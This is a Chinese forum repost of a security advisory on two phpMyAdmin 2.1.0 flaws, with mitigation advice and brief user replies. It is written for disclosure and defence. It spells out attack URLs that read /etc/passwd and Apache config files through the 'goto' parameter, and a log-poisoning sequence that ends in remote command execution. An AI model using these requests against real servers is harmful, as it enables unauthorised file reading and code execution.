[转帖]phpMyAdmin2.1.0存在两个漏洞

来源:52w.net  phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具，具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本：  phpMyAdmin 2.2.0。  1、目录遍历漏洞  攻击者通过提供如下的 URL:  http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)  http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd  能非法访问系统文件  有问题的代码在：  'include($goto);' in sql.php and in tbl_replace.php.  2、执行攻击者代码漏洞  通过使用全局可写日志文件，攻击者能在受影响服务器上执行任意代码。  首先，得到 Apache 配置文件以便知道日志文件存储位置：  http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No  http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No  http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No  可以看出，日志放在：  /var/log/httpd/error_log  /var/log/httpd/access_log  然后 telnet 到 端口80  # telnet www.example.com 80  Trying xxx.xxx.xxx.xxx...  Connected to www.example.com.  Escape character is '^]'.  GET  ^]  telnet> quit  Connection closed.  #  在 GET 请求之后，攻击者能将任意 PHP 代码上传  现在，可以用 Apache 用户身份远程运行命令了：  http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/  access_log&btnDrop=No?meters=ls%20-l%20/  受影响系统：  phpMyAdmin 2.1.0  解决方案：  建议:  1.使用 phpMyAdmin 2.2.0  http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz  2.用户下载安装补丁：  http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff

解决这个问题现在很简单了 那就是升级版本

其实，由于mysql的客户/服务器模式 ，我们不害怕任何phpMyAdmin漏洞。因为我们完全没有必要把phpMyAdmin放在服务器上。我们只需要在远程安装phpMyAdmin，然后连接到mysql服务器即可。就像我现在的论坛，也是经常用到phpMyAdmin，但是phpMyAdmin在我的个人pc上，并不在服务器上，所以，有安全漏洞并不怕，只要执行命令没有错误就好了。    这个帖子主要是针对喜欢把phpMyAdmin放在服务器上使用的朋友来说的，应该注意这个问题。

我的是压缩版的，没问题吧？哈哈。